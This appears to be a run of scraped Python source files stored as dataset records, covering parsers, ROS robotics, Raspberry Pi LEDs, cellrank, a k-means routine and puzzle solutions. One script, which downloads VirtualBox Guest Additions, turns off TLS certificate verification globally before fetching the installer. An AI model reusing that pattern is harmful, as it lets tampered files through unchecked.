_load(rule.strip())\n\ndef parse(tokens, rule=\"BLOCKS\"):\n res = grammar[rule](tokens)\n res.rule = rule\n return res\n\nwith open(\"grammar.txt\") as f:\n load(f.read())\n","repo_name":"BluCodeGH/willow","sub_path":"grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":5518,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"16620271808","text":"#!/usr/bin/python3\n'''script for task 8'''\n\nimport sys\nfrom model_state import State\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.pool import NullPool\n\n\nif __name__ == '__main__':\n\n engine = create_engine('mysql+mysqldb://{}:{}@{}:{}/{}'.format(\n sys.argv[1], sys.argv[2], 'localhost', '3306', sys.argv[3]),\n pool_pre_ping=True, poolclass=NullPool)\n Session = sessionmaker(bind=engine)\n local_session = Session()\n result = local_session.query(State).order_by(State.id).first()\n local_session.close()\n\n if result:\n print('{}: {}'.format(result.id, result.name))\n else:\n print('Nothing')\n","repo_name":"AbdulMah/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/8-model_state_fetch_first.py","file_name":"8-model_state_fetch_first.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27417520330","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom pathlib import Path\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlretrieve\nimport re\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\n\n#%%\ndef find_last_ed(url, version_digit,sub_digit):\n#version_digit,sub_digit = 5,3\n html = urlopen(url)\n soup = BeautifulSoup(html.read(), 'lxml')\n maximum = 0\n for link in soup.find_all('a', href=True):\n dlink = link.get('href')\n dlink = re.sub(r'/', r'', dlink)\n vlink = dlink\n dlink=dlink.split('.')\n if len(dlink)==3:\n if int(dlink[0])==version_digit:\n if int(dlink[1])==sub_digit:\n #print(dlink[2])\n try:\n results = list(map(int, dlink))\n print(vlink)\n maximum = max(maximum, results[2])\n except:\n pass\n print('==')\n url2 = 'https://download.virtualbox.org/virtualbox/'+ str(version_digit) + '.' + str(sub_digit) + '.'+str(maximum)\n html = urlopen(url2)\n soup = BeautifulSoup(html.read(), 'lxml')\n for link in soup.find_all('a', href=True):\n dlink = link.get('href')\n if 'VBoxGuestAdditions' in dlink:\n url3 = url2+'/'+dlink\n link_name = dlink\n print(url3)\n return(url3, link_name)\n\nurl = 'https://download.virtualbox.org/virtualbox/'\nurl3, link_name = find_last_ed(url,6,0) \n#%%\nurlretrieve(url3, str(Path.home())+'/Downloads/'+link_name)\n","repo_name":"blucap/GetOracleVBoxGuestAdditions","sub_path":"oracle_guest.py","file_name":"oracle_guest.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"10755315831","text":"\"\"\"General utility functions.\"\"\"\r\n\r\nimport wx, application\r\n\r\ndef do_error(message, title = 'Error', style = None):\r\n \"\"\"Display an error message.\"\"\"\r\n if style is None:\r\n style = wx.ICON_EXCLAMATION\r\n return wx.MessageBox(str(message), str(title), style = style)\r\n\r\ndef create_editor(filename = None):\r\n \"\"\"Create a new editor.\"\"\"\r\n editor = EditorFrame()\r\n if filename is not None:\r\n editor.load_file(filename)\r\n editor.Show(True)\r\n editor.Maximize(True)\r\n application.editors.append(editor)\r\n return editor\r\n\r\nfrom .editor import EditorFrame\r\n","repo_name":"chrisnorman7/dotsmith","sub_path":"gui/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"36084514536","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport numpy as np\n# ROS packages\nimport rospy\nimport rospkg\nfrom sensor_msgs.msg import Imu\n# Our packages\nfrom stopwatch import StopWatch # noqa: E402\nfrom storage import StaticPoseData, DynamicPoseData # noqa: E402\nfrom hiro_ros_arm_controller.RobotController import PandaController # noqa: E402\nROS_ROBOTIC_SKIN_PATH = rospkg.RosPack().get_path('ros_robotic_skin')\nsys.path.append(os.path.join(ROS_ROBOTIC_SKIN_PATH, 'scripts'))\nimport utils # noqa: E402\n\nRATE = rospy.get_param('/dynamic_frequency')\nSIM_DT = 1.0 / RATE\nSTATIC_MOTION_RECORD_TIME = 3.0\nDYNAMIC_MOTION_RECORD_TIME = rospy.get_param('/oscillation_time')\nFREQS = rospy.get_param('/oscillation_frequency')\nAMPLITUDES = rospy.get_param('/oscillation_magnitude')\nIS_SIM = rospy.get_param('/is_sim')\nREST_TIME = rospy.get_param('/rest_time')\n\n\nclass DataCollector:\n \"\"\"\n Class for collecting dynamic pose data and save them as a pickle file\n \"\"\"\n def __init__(self, controller, poses_list, is_sim=True,\n savedir='data',\n static_filename='static_data.pickle',\n dynamic_filename='dynamic_data.pickle',\n ):\n \"\"\"\n Initializes DataCollector class.\n\n Arguments\n -----------\n controller:\n Wrapped controller to control either a robot.\n poses_list: list\n A list of poses. Each pose is a list.\n It includes 7 joint position, 7 joint velociites, and Pose name\n filepath: str\n File path to save the collected data\n \"\"\"\n self.controller = controller\n self.poses_list = poses_list\n self.is_sim = is_sim\n # constant\n self.pose_names = [pose[2] for pose in poses_list]\n self.joint_names = map(str, self.controller.joint_names)\n\n # get imu names and topics through rostopic and xacro.\n self.imu_names, self.imu_topics = utils.get_imu_names_and_topics()\n\n self.curr_pose_name = self.pose_names[0]\n self.curr_joint_name = self.joint_names[0]\n self.prev_angular_velocity = 0.0\n\n self.watch_dt = StopWatch()\n self.watch_dynamic_motion = StopWatch()\n self.watch_static_motion = StopWatch()\n\n self.r = rospy.Rate(RATE)\n self.sim_dt = 1.0/RATE\n\n # data storage\n static_filename = os.path.join(savedir, static_filename)\n dynamic_filename = os.path.join(savedir, dynamic_filename)\n self.static_acceleration_storage = StaticPoseData(self.pose_names, self.imu_names, static_filename)\n self.dynamic_acceleration_storage = DynamicPoseData(self.pose_names, self.joint_names, self.imu_names, dynamic_filename)\n # Subscribe to IMUs\n for imu_topic in self.imu_topics:\n rospy.Subscriber(imu_topic, Imu, self.callback)\n\n def callback(self, data):\n \"\"\"\n A callback function for IMU topics\n\n Arguments\n ----------\n data: sensor_msgs.msg.Imu\n IMU data. Please refer to the official documentation.\n http://docs.ros.org/melodic/api/sensor_msgs/html/msg/Imu.html\n \"\"\"\n if self.watch_static_motion.is_started():\n acceleration = utils.Vector3_to_np(data.linear_acceleration)\n quaternion = utils.Quaternion_to_np(data.orientation)\n joint_angles = self.controller.joint_angles\n\n self.static_acceleration_storage.append(\n pose_name=self.curr_pose_name, # for each defined initial pose\n imu_name=data.header.frame_id, # frame id of imu\n data=np.r_[\n quaternion,\n acceleration,\n joint_angles\n ]\n )\n\n if self.watch_dynamic_motion.is_started():\n acceleration = utils.Vector3_to_np(data.linear_acceleration)\n\n dt = self.watch_dt.get_elapsed_time()\n self.watch_dt.restart()\n if self.is_sim and dt <= 0.9*self.sim_dt:\n return\n\n curr_angular_velocity = self.controller.joint_velocity(self.curr_joint_name)\n angular_acceleration = (curr_angular_velocity - self.prev_angular_velocity) / dt\n self.prev_angular_velocity = curr_angular_velocity\n\n joint_angles = self.controller.joint_angles\n\n # time\n t = self.watch_dynamic_motion.get_elapsed_time()\n self.dynamic_acceleration_storage.append(\n pose_name=self.curr_pose_name, # for each defined initial pose\n joint_name=self.curr_joint_name, # for each excited joint\n imu_name=data.header.frame_id, # for each imu\n data=np.r_[\n acceleration,\n joint_angles,\n t,\n angular_acceleration,\n AMPLITUDES[0], # Need to remove this later.\n curr_angular_velocity,\n ]\n )\n\n def goto_defined_pose(self, pose, rest_time, log=True):\n positions, _, pose_name = pose[0], pose[1], pose[2] # noqa: F841\n # first, move to the position from _positions.txt\n # TODO: We have to ensure that commanded positions are reached\n # Then REST_TIME should start once it reached the goal.\n self.controller.publish_positions(positions, sleep=rest_time)\n\n self.curr_pose_name = pose_name\n if log:\n print(\n 'At Position: ' + pose_name,\n map(int, np.rad2deg(np.array(positions)))\n )\n\n def record_static_motion(self, static_motion_record_time=3):\n self.watch_static_motion.start()\n rospy.sleep(static_motion_record_time)\n self.watch_static_motion.stop()\n\n def prepare_prev_states(self, joint_name):\n # Prepare for publishing velocities\n self.curr_joint_name = joint_name\n # Get current joint velocity\n self.prev_angular_velocity = self.controller.joint_velocity(self.curr_joint_name)\n\n def start_watches(self, dynamic_motion_record_time):\n # Start motion and recording\n self.watch_dt.start()\n self.watch_dynamic_motion.set_timer(dynamic_motion_record_time)\n self.watch_dynamic_motion.start()\n\n def collect_data(self, amplitudes, freqs, rest_time,\n static_motion_record_time,\n dynamic_motion_record_time):\n \"\"\"\n This will move the joint of the robot arm like a sine wave\n for all joints for all defined poses.\n \"\"\"\n self.controller.set_joint_position_speed(speed=1.0)\n\n for pose in self.poses_list:\n self.goto_defined_pose(pose, rest_time)\n # Record for given time\n # import time\n # time.sleep(100)\n self.record_static_motion(static_motion_record_time)\n\n for i, joint_name in enumerate(self.joint_names):\n # Go to current setting position\n if i != 0:\n self.goto_defined_pose(pose, rest_time, log=False)\n\n # Prepare for recording dynamic motion\n self.prepare_prev_states(joint_name)\n self.start_watches(dynamic_motion_record_time)\n\n velocities = np.zeros(len(self.joint_names))\n while True:\n # time within motion\n t = self.watch_dynamic_motion.get_elapsed_time()\n\n # Oscillated Velocity pattern\n velocities[i] = amplitudes[i] * np.sin(2 * np.pi * freqs[i] * t)\n self.controller.send_velocities(velocities)\n\n if self.watch_dynamic_motion.is_ended():\n break\n\n if rospy.is_shutdown():\n return\n self.r.sleep()\n\n self.watch_dynamic_motion.stop()\n rospy.sleep(0.1)\n\n def save(self, save=True, verbose=False, clean_static=True, clean_dynamic=True):\n \"\"\"\n Save data to a pickle file.\n\n\n Arguments\n ----------\n `save`: `bool`\n If the data will be saved\n\n `verbose`: `bool`\n \"\"\"\n if clean_static:\n static_data = self.static_acceleration_storage.clean_data(verbose)\n else:\n static_data = self.static_acceleration_storage.data\n\n if clean_dynamic:\n dynamic_data = self.dynamic_acceleration_storage.clean_data(verbose)\n else:\n dynamic_data = self.dynamic_acceleration_storage.data\n\n if save:\n rospy.loginfo('saving')\n self.static_acceleration_storage.save(static_data)\n self.dynamic_acceleration_storage.save(dynamic_data)\n\n\nif __name__ == '__main__':\n rospy.init_node('data_collection')\n\n controller = PandaController(is_sim=IS_SIM)\n filename = 'panda_positions.txt'\n\n poses_list = utils.get_poses_list_file(filename)\n\n savedir = os.path.join(ROS_ROBOTIC_SKIN_PATH, 'data')\n static_filename = 'static_data_panda.pickle'\n dynamic_filename = 'dynamic_data_panda.pickle'\n\n data_collector = DataCollector(\n controller=controller,\n poses_list=poses_list,\n is_sim=IS_SIM,\n savedir=savedir,\n static_filename=static_filename,\n dynamic_filename=dynamic_filename\n )\n\n data_collector.collect_data(\n amplitudes=AMPLITUDES,\n freqs=FREQS,\n rest_time=REST_TIME,\n static_motion_record_time=STATIC_MOTION_RECORD_TIME,\n dynamic_motion_record_time=DYNAMIC_MOTION_RECORD_TIME\n )\n data_collector.save(save=True, verbose=False)\n","repo_name":"HIRO-group/ros_robotic_skin","sub_path":"scripts/data_generation/collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":9714,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"2479014348","text":"\"\"\"LED wrapper class\"\"\"\nimport threading\nimport time\nfrom RPi import GPIO\n\nclass Led:\n \"\"\"LED wrapper class\"\"\"\n def __init__(self, id_, pwm):\n GPIO.setup(id_, GPIO.OUT)\n\n if pwm:\n self.pwm = GPIO.PWM(id_, 50)\n self.brightness = 50\n else:\n self.pwm = pwm\n self.brightness = 0\n\n self.id_ = id_\n self.state = GPIO.LOW\n self.update_status()\n\n def set_pwm(self, state):\n \"\"\"Enable or disable PWM on the pin\"\"\"\n if state:\n if self.pwm:\n return self.get_status()\n self.pwm = GPIO.PWM(self.id_, 50)\n if self.state == GPIO.HIGH:\n self.pwm.start(100)\n else:\n self.pwm.start(0)\n else:\n if not self.pwm:\n return self.get_status()\n self.pwm.stop()\n self.pwm = False\n return self.get_status()\n\n def led_on(self):\n \"\"\"Turn LED on\"\"\"\n if self.state == GPIO.HIGH:\n return self.get_status()\n\n self.state = GPIO.HIGH\n return self.update_status()\n\n def led_off(self):\n \"\"\"Turn LED off\"\"\"\n if self.state == GPIO.LOW:\n return self.get_status()\n\n self.state = GPIO.LOW\n return self.update_status()\n\n def led_toggle(self):\n \"\"\"Set LED to opposite state\"\"\"\n if self.state == GPIO.LOW:\n self.state = GPIO.HIGH\n else:\n self.state = GPIO.LOW\n return self.update_status()\n\n def led_blink(self, duration=.5):\n \"\"\"Blink a LED\"\"\"\n self.led_toggle()\n time.sleep(duration)\n return self.led_toggle()\n\n def _pwm_on(self):\n for dc in range(0, 101, 5):\n self.set_brightness(dc)\n time.sleep(0.01)\n\n def _pwm_off(self):\n for dc in range(100, -1, -5):\n self.set_brightness(dc)\n time.sleep(0.01)\n\n def get_status(self):\n \"\"\"Get LED status\"\"\"\n if not self.pwm:\n pwm = self.pwm\n else:\n pwm = True\n\n return {\n 'id': self.id_,\n 'state': self.state,\n 'pwm': pwm\n }\n\n def update_status(self):\n \"\"\"Update the LED according to state\"\"\"\n if self.pwm:\n if self.state == GPIO.HIGH:\n thread = threading.Thread(target=self._pwm_on, args=())\n thread.start()\n elif self.state == GPIO.LOW:\n thread = threading.Thread(target=self._pwm_off, args=())\n thread.start()\n else:\n GPIO.output(self.id_, self.state)\n\n return self.get_status()\n\n def set_brightness(self, brightness):\n \"\"\"Set the brightness of a PWM enabled LED, and update the local state\"\"\"\n if (self.pwm):\n self.brightness = brightness\n self.pwm.ChangeDutyCycle(brightness)\n\n","repo_name":"joms/ledmastree","sub_path":"backend/classes/led.py","file_name":"led.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"18449614472","text":"from typing import Dict, Any, Union\nfrom pydantic import BaseModel\n\nfrom src.assembly_point__db.helpers.add_full_report import add_full_report\nfrom src.assembly_point__db.helpers.add_test_descr import add_new_test_descr, last_test_descr_id\n\n\nclass ReportAddResponse(BaseModel):\n data: Dict[str, Union[int, str]]\n stand: int\n\n\ndef api_report_add(data: Dict[str, Any]) -> Dict[str, Any]:\n stand = data['stend']\n cmd = data['data']['cmd']\n start = data['data']['start']\n serial = data['data']['serial']\n mac = data['data']['mac']\n errors = data['data']['errors']\n text = data['data']['text']\n add_new_test_descr(start=start, serial=serial, mac=mac, errors=errors, stend_id=stand)\n add_full_report(string=text)\n data = {\n \"test_id\": last_test_descr_id(),\n \"cmd\": cmd\n }\n result = ReportAddResponse(data=data, stand=stand).dict()\n return result\n","repo_name":"ArturManuilenko/stands-db-api","sub_path":"src/assembly_point__api/routes/api__old_report_add.py","file_name":"api__old_report_add.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"19125651728","text":"import abc\nfrom typing import Any, Union\n\nimport numpy as np\nimport scipy.sparse as sp\n\nfrom cellrank import logging as logg\nfrom cellrank._utils._utils import _connected, _get_neighs, _symmetric\n\n__all__ = [\"ConnectivityMixin\", \"UnidirectionalMixin\", \"BidirectionalMixin\"]\n\n\nclass ConnectivityMixin:\n \"\"\"Mixin class that reads kNN connectivities and allows for density normalization.\"\"\"\n\n def _read_from_adata(\n self,\n conn_key: str = \"connectivities\",\n check_connectivity: bool = False,\n check_symmetric: bool = True,\n **kwargs: Any,\n ) -> None:\n super()._read_from_adata(**kwargs)\n self._conn_key = conn_key\n conn = _get_neighs(self.adata, mode=\"connectivities\", key=conn_key)\n self._conn = sp.csr_matrix(conn).astype(np.float64, copy=False)\n\n if check_connectivity and not _connected(self.connectivities):\n logg.warning(\"kNN graph is not connected\")\n if check_symmetric and not _symmetric(self.connectivities):\n logg.warning(\"kNN graph is not symmetric\")\n\n def _density_normalize(self, matrix: Union[np.ndarray, sp.spmatrix]) -> Union[np.ndarray, sp.spmatrix]:\n \"\"\"\n Density normalization by the underlying kNN graph.\n\n Parameters\n ----------\n matrix\n Matrix to normalize.\n\n Returns\n -------\n Density normalized matrix.\n \"\"\"\n logg.debug(\"Density normalizing the transition matrix\")\n\n q = np.asarray(self.connectivities.sum(axis=0)).squeeze()\n Q = sp.spdiags(1.0 / q, 0, matrix.shape[0], matrix.shape[0])\n\n return Q @ matrix @ Q\n\n @property\n def connectivities(self) -> sp.csr_matrix:\n \"\"\"Underlying connectivity matrix.\"\"\"\n return self._conn\n\n\nclass UnidirectionalMixin:\n \"\"\"Mixin specifying that its kernel doesn't is directionless.\"\"\"\n\n @property\n def backward(self) -> None:\n \"\"\"None.\"\"\"\n\n\nclass BidirectionalMixin(abc.ABC):\n \"\"\"Mixin specifying that its kernel has forward or backward directions.\"\"\"\n\n def __init__(self, *args: Any, backward: bool = False, **kwargs: Any):\n super().__init__(*args, **kwargs)\n if not isinstance(backward, (bool, np.bool_)):\n raise TypeError(f\"Expected `backward` to be `bool`, found `{type(backward).__name__}`.\")\n self._backward = bool(backward)\n self._init_kwargs[\"backward\"] = backward\n\n @abc.abstractmethod\n def __invert__(self) -> \"BidirectionalMixin\":\n pass\n\n @property\n def backward(self) -> bool:\n \"\"\"Direction of the process.\"\"\"\n return self._backward\n","repo_name":"theislab/cellrank","sub_path":"src/cellrank/kernels/mixins/_kernel.py","file_name":"_kernel.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":272,"dataset":"github-code","pt":"71"} +{"seq_id":"31759570289","text":"#!/usr/bin/env python3\nfrom brain_games.game_logics.body_game_logic import body_game_displaying\nfrom brain_games.games.progression import get_progression\n\n'''Send rules of the game and function of the game into 'body_game_displaying'''\n\n\ndef main():\n game_rules = \"What number is missing in the progression?\"\n game_function = get_progression\n body_game_displaying(game_rules, game_function)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"NoFate35/python-project-49","sub_path":"brain_games/scripts/brain_progression.py","file_name":"brain_progression.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"3061275699","text":"import functools\nfrom utils import aoc\nfrom collections import defaultdict\n\n\ndef parse_input() -> set[complex]:\n scan = aoc.get_input(\"23\")\n return {\n x + 1j * y\n for y, line in enumerate(scan)\n for x, c in enumerate(line)\n if c == \"#\"\n }\n\n\ndef find_neighbors(elf: complex) -> list[complex]:\n return [\n elf - 1,\n elf + 1,\n elf - 1j,\n elf + 1j,\n elf + 1 + 1j,\n elf + 1 - 1j,\n elf - 1 + 1j,\n elf - 1 - 1j,\n ]\n\n\ndef find_moves(elf: complex) -> list:\n return [\n [[elf - 1j, elf + 1 - 1j, elf - 1 - 1j], elf - 1j],\n [[elf + 1j, elf + 1 + 1j, elf - 1 + 1j], elf + 1j],\n [[elf - 1 + 1j, elf - 1 - 1j, elf - 1], elf - 1],\n [[elf + 1 + 1j, elf + 1 - 1j, elf + 1], elf + 1],\n ]\n\n\ndef move(grid: set[complex], elf: complex, n_round: int) -> complex:\n elf_neighbors = find_neighbors(elf)\n elf_moves = find_moves(elf)\n\n if all(not neighbor in grid for neighbor in elf_neighbors):\n return elf\n\n for i in range(n_round, n_round + 4):\n if all(move not in grid for move in elf_moves[i % len(elf_moves)][0]):\n return elf_moves[i % len(elf_moves)][1]\n\n return elf\n\n\ndef play(grid: set[complex], n_round: int) -> tuple[set[complex], bool]:\n moved = False\n moves = defaultdict(list)\n new_grid = set()\n\n for elf in grid:\n new_elf = move(grid, elf, n_round)\n if new_elf != elf:\n moved = True\n moves[new_elf].append(elf)\n\n for k, v in moves.items():\n if len(v) == 1:\n new_grid.add(k)\n else:\n new_grid.update(v)\n\n return new_grid, moved\n\n\ndef part1() -> float:\n grid = parse_input()\n for round_n in range(10):\n grid, _ = play(grid, round_n)\n imaginaries = sorted([i.imag for i in grid])\n reals = sorted([i.real for i in grid])\n return (reals[-1] - reals[0] + 1) * (1 + imaginaries[-1] - imaginaries[0]) - len(\n grid\n )\n\n\n@functools.cache\ndef part2() -> int:\n moved = True\n grid = parse_input()\n round_n = 0\n\n while moved:\n grid, moved = play(grid, round_n)\n round_n += 1\n\n return round_n\n\n\nif __name__ == \"__main__\":\n print(part1())\n print(part2())\n","repo_name":"masmeert/advent-of-code","sub_path":"2022/23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"23184331798","text":"from django.shortcuts import render , redirect\nfrom django.http import HttpResponse\nfrom .models import Applicants\nfrom companies.models import Company\n\n\ndef create(request):\n if request.method == \"POST\":\n firstName = request.POST[\"firstName\"]\n lastName = request.POST[\"lastName\"]\n age = int(request.POST[\"age\"])\n education = request.POST[\"education\"]\n experience = request.POST[\"experience\"]\n gender = request.POST[\"gender\"]\n computer = request.POST[\"ability\"]\n\n\n\n if computer == \"YES\":\n computer = 1\n else:\n computer = 0\n \n applicant = Applicants.objects.create(firstName = firstName,lastName = lastName, age = age, education = education , experience = experience , gender = gender , computer = computer )\n\n return redirect(\"applicants\")\n else:\n\n companies = Company.objects.filter(available = True)\n\n return render(request,\"applicants/create.html\")\n\ndef applicants(request):\n applicants = Applicants.objects.all()\n\n context = {\n \"applicants\":applicants\n }\n\n return render(request,\"applicants/applicants.html\",context)\n\ndef questions(request):\n if request.method == \"POST\":\n experience = request.POST[\"experience\"]\n experience3= request.POST[\"experience3\"]\n education = request.POST[\"education\"]\n income = request.POST[\"income\"]\n\n applicants = Applicants.objects.filter(experience = experience)\n\n qn2 = False\n qn3 = False\n qn4 = False\n\n if education != \"\":\n counts = Applicants.objects.filter(education=education).count()\n qn2 = True\n \n if experience3 != \"\":\n applicant3 = Applicants.objects.filter(experience = experience)\n qn4 = True\n \n # Qn 3\n if income != \"\":\n income = float(income)\n companies_income = Company.objects.filter(income__gte = income)\n qn3 = True\n\n\n context = {\n \"applicants\":applicants,\n \"counts\":{\n \"qn2\":qn2,\n \"counts\":counts\n } ,\n \"income\":{\n \"qn3\":qn3,\n \"companies\":companies_income\n } , \n \"experience\":{\n \"qn4\":qn4,\n \"applicants\":applicant3\n } \n }\n\n return render(request,\"applicants/questions.html\",context)\n return render(request,\"applicants/questions.html\")\n\n\n","repo_name":"Musa24/practical_work_logic","sub_path":"labor_exchange/applicants/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30454869272","text":"#!/usr/bin/env python3\n\"\"\" Bidirectional Cell\"\"\"\n\nimport numpy as np\n\n\nclass BidirectionalCell():\n \"\"\" Bidirectional Cell\"\"\"\n\n def __init__(self, i, h, o):\n \"\"\"\n * The weights will be used on the right side for matrix\n multiplication\n * The biases should be initialized as zeros\n \"\"\"\n self.Whf = np.random.normal(size=(i + h, h))\n self.Whb = np.random.normal(size=(i + h, h))\n self.Wy = np.random.normal(size=((2 * h), o))\n self.bhf = np.zeros((1, h))\n self.bhb = np.zeros((1, h))\n self.by = np.zeros((1, o))\n\n def forward(self, h_prev, x_t):\n \"\"\"\n * Returns: h_next, the next hidden state\n \"\"\"\n xh = np.concatenate((h_prev, x_t), axis=1)\n h_next = np.tanh(np.dot(xh, self.Whf) + self.bhf)\n return h_next\n\n def backward(self, h_next, x_t):\n \"\"\"\n * Returns: h_pev, the previous hidden state\n \"\"\"\n xh = np.concatenate((h_next, x_t), axis=1)\n h_prev = np.tanh(np.dot(xh, self.Whb) + self.bhb)\n return h_prev\n\n def output(self, H):\n \"\"\"\n Returns: Y, the outputs\n \"\"\"\n t, m, h_two = H.shape\n o = self.by.shape[1]\n Y = np.zeros((t, m, o))\n for i in range(t):\n y_pred = np.dot(H[i], self.Wy) + self.by\n y_pred = np.exp(y_pred) / np.sum(np.exp(y_pred),\n axis=1, keepdims=True)\n Y[i] = y_pred\n return Y\n","repo_name":"Nzparra/holbertonschool-machine_learning","sub_path":"supervised_learning/0x0D-RNNs/7-bi_output.py","file_name":"7-bi_output.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"22420245274","text":"import json\nimport numpy as np\nimport pandas as pd\nimport rich\n\n\n# Load data from BENCH\nwith open(\"L_8_3.json\") as f:\n my_list = [json.loads(line) for line in f]\ndf = pd.DataFrame(my_list)\n\n# GROUP BY Radius -> Zenith\ngrouped = df.groupby([\"radius\", \"zenith\"]).sum()\n\n# Collect separated datapoints [radius, zenith, recall]\ndatapoints = []\nfor name, group in grouped.iterrows():\n radius, zenith = name\n\n tp = group[\"tp\"]\n p = group[\"p\"]\n recall = tp / p\n datapoints.append(\n {\n \"radius\": radius,\n \"zenith\": zenith,\n \"recall\": recall,\n }\n )\nrich.print(datapoints)\n\n# Plot Heatmap\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndf = pd.DataFrame(datapoints)\ndf = df.pivot(\"radius\", \"zenith\", \"recall\")\nsns.heatmap(df, annot=False, square=True)\nplt.show()\n","repo_name":"eyecan-ai/leakers","sub_path":"examples/benches/analyze_json.py","file_name":"analyze_json.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27739451367","text":"import random\nfrom math import pow as pow\nfrom operator import itemgetter\nfrom Calculate_J import J\nfrom copy import deepcopy\n\n#将质心的取值范围固定在数据中的最大恩格尔系数和最小恩格尔系数之间\ndef kmeans(k, dict_items, max_engle, min_engle):\n\n dict_cluster = {}\n\n tmp_cluster = {} # 暂时存储聚类后的结果\n\n J_values = [] #存储每一次聚类之后的J值\n e = 0.0000001 #判断J值收敛的误差范围\n\n N = 1 #记录迭代次数\n U = [] #初始化质心\n for i in range(0, k):\n tmp = random.uniform(min_engle, max_engle)\n U.append(tmp)\n tmp_cluster[tmp] = []\n\n\n\n flag = 0\n while flag == 0:\n\n print('第%d次迭代后'%N, '质心为:', U)\n\n for city_key in dict_items.keys():\n\n distance = {} # 存放每个城市恩格尔系数与质心的距离\n engle = dict_items[city_key]\n for n in tmp_cluster.keys():\n\n d = pow(n -engle, 2)\n distance[n] = d\n\n # 将distance按照字典的值进行排序,选出最小距离\n L = sorted(distance.items(), key=itemgetter(1))\n tmp_cluster[L[0][0]].append((city_key, engle, L[0][1]))\n\n dict_cluster = deepcopy(tmp_cluster)\n #print('聚类后结果',dict_cluster)\n J_values.append(J(dict_cluster)) # 聚类之后的J值\n\n # 更新一次质心\n N += 1\n U.clear()\n tmp_cluster.clear()\n for m in dict_cluster.keys():\n sum = 0\n for j in range(0, len(dict_cluster[m])):\n sum += dict_cluster[m][j][1]\n\n if sum == 0: #随机生成的质心可能没有一个数据点靠近它\n U.append(m)\n print('没有类别的质心:',m)\n\n else:\n new_u = sum / len(dict_cluster[m])\n U.append(new_u)\n tmp_cluster[new_u] = []\n\n\n if len(J_values) != 1:\n t = pow(J_values[-1] - J_values[-2], 2)\n if t <= e: #已收敛\n flag = 1\n\n\n\n return dict_cluster\n\n\n\n\n\n\n","repo_name":"fay0505/K-Means","sub_path":"Kmeans.py","file_name":"Kmeans.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"74436888229","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom source.cs_1 import prepare_feature, prepare_target, compute_cost_linreg\n\n\ndef test_cs_1(df_feature_z_df_target):\n df_feature, df_target = df_feature_z_df_target\n\n X = prepare_feature(df_feature)\n target = prepare_target(df_target)\n\n assert isinstance(X, np.ndarray)\n assert isinstance(target, np.ndarray)\n assert X.shape == (506, 2)\n assert target.shape == (506, 1)\n\n # print(X)\n beta = np.zeros((2,1))\n J = compute_cost_linreg(X, target, beta)\n # print(J)\n assert np.isclose(J, 296.0735)\n\n beta = np.ones((2,1))\n J = compute_cost_linreg(X, target, beta)\n # print(J)\n assert np.isclose(J, 268.157)\n\n beta = np.array([-1, 2]).reshape((2,1))\n J = compute_cost_linreg(X, target, beta)\n # print(J)\n assert np.isclose(J, 308.337)","repo_name":"natalieagus/d2w_2023_cohort_lead","sub_path":"week9/tests/test_cs_1.py","file_name":"test_cs_1.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"6008789309","text":"# -*- coding: utf-8 -*-\n\"\"\"\nExample code to call Rosette API to get entities's relationships from a piece of text.\n\"\"\"\n\nimport argparse\nimport json\nimport os\n\nfrom rosette.api import API, DocumentParameters, RosetteException\n\n\ndef run(key, alt_url='https://api.rosette.com/rest/v1/'):\n \"\"\" Run the example \"\"\"\n # Create an API instance\n api = API(user_key=key, service_url=alt_url)\n relationships_text_data = \"FLIR Systems is headquartered in Oregon and produces thermal imaging, night vision, and infrared cameras and sensor systems. According to the SEC’s order instituting a settled administrative proceeding, FLIR entered into a multi-million dollar contract to provide thermal binoculars to the Saudi government in November 2008. Timms and Ramahi were the primary sales employees responsible for the contract, and also were involved in negotiations to sell FLIR’s security cameras to the same government officials. At the time, Timms was the head of FLIR’s Middle East office in 